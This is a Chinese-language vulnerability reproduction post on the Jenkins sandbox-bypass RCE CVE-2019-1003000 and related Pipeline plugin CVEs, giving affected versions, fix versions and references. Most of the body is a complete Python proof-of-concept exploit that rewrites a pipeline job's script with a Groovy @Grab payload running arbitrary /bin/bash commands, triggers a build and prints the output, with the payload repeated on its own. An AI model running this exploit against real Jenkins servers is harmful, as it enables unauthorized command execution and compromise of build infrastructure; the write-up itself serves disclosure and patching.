Jenkins RCE CVE-2019-1003000 漏洞复现（jenkins sonar）

Jenkins RCE CVE-2019-1003000 漏洞复现（jenkins sonar）

0x00 简述

拥有Overall/Read 权限的用户可以绕过沙盒保护，在jenkins可以执行任意代码CVE-2019-1003000 (Script Security)CVE-2019-1003001 (Pipeline: Groovy)CVE-2019-1003002 (Pipeline: Declarative)

0x01 受影响的版本

Pipeline: Declarative Plugin up to and including 1.3.4Pipeline: Groovy Plugin up to and including 2.61Script Security Plugin up to and including 1.49

0x02 漏洞复现

0x03 payload

#!/usr/bin/python # Author: Adam Jordan # Date: 2019-02-15 # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) import argparse import jenkins import time from xml.etree import ElementTree payload = ''' import org.buildobjects.process.ProcBuilder @Grab('org.buildobjects:jproc:2.2.3') class Dummy{ } print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString() ''' def run_command(url, cmd, job_name, username, password): print '[+] connecting to jenkins...' # 连接jenkins服务器 server = jenkins.Jenkins(url, username, password) print '[+] crafting payload...' ''' false true false ''' #得到job的配置文件 如上 ori_job_config = server.get_job_config(job_name) et = ElementTree.fromstring(ori_job_config) print et et.find('definition/script').text = payload % cmd job_config = ElementTree.tostring(et, encoding='utf8', method='xml') print '[+] modifying job with payload...' ''' false true false ''' #修改后的job配置文件 server.reconfig_job(job_name, job_config) time.sleep(3) print '[+] putting job build to queue...' queue_number = server.build_job(job_name) time.sleep(3) print '[+] waiting for job to build...' queue_item_info = {} while 'executable' not in queue_item_info: queue_item_info = server.get_queue_item(queue_number) time.sleep(1) print '[+] restoring job...' server.reconfig_job(job_name, ori_job_config) time.sleep(3) print '[+] fetching output...' last_build_number = server.get_job_info(job_name)['lastBuild']['number'] console_output = server.get_build_console_output(job_name, last_build_number) print '[+] OUTPUT:' print console_output if __name__ == '__main__': parser = argparse.ArgumentParser(description='Jenkins RCE') parser.add_argument('--url', help='target jenkins url') parser.add_argument('--cmd', help='system command to be run') parser.add_argument('--job', help='job name') parser.add_argument('--username', help='username') parser.add_argument('--password', help='password') args = parser.parse_args() run_command(args.url, args.cmd, args.job, args.username, args.password)

首先从jenkins获取job my-pipeline的配置文件，然后将payload写入配置文件，重新构建job.

payload = ''' import org.buildobjects.process.ProcBuilder @Grab('org.buildobjects:jproc:2.2.3') class Dummy{ } print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString() '''

0x04 修复建议

更新升级组件到安全版本Pipeline: Declarative Plugin should be updated to version 1.3.4.1Pipeline: Groovy Plugin should be updated to version 2.61.1Script Security Plugin should be updated to version 1.50

参考连接：http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.htmlhttps://github.com/adamyordan/cve-2019-1003000-jenkins-rce-pochttps://jenkins.io/security/advisory/2019-01-08/

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。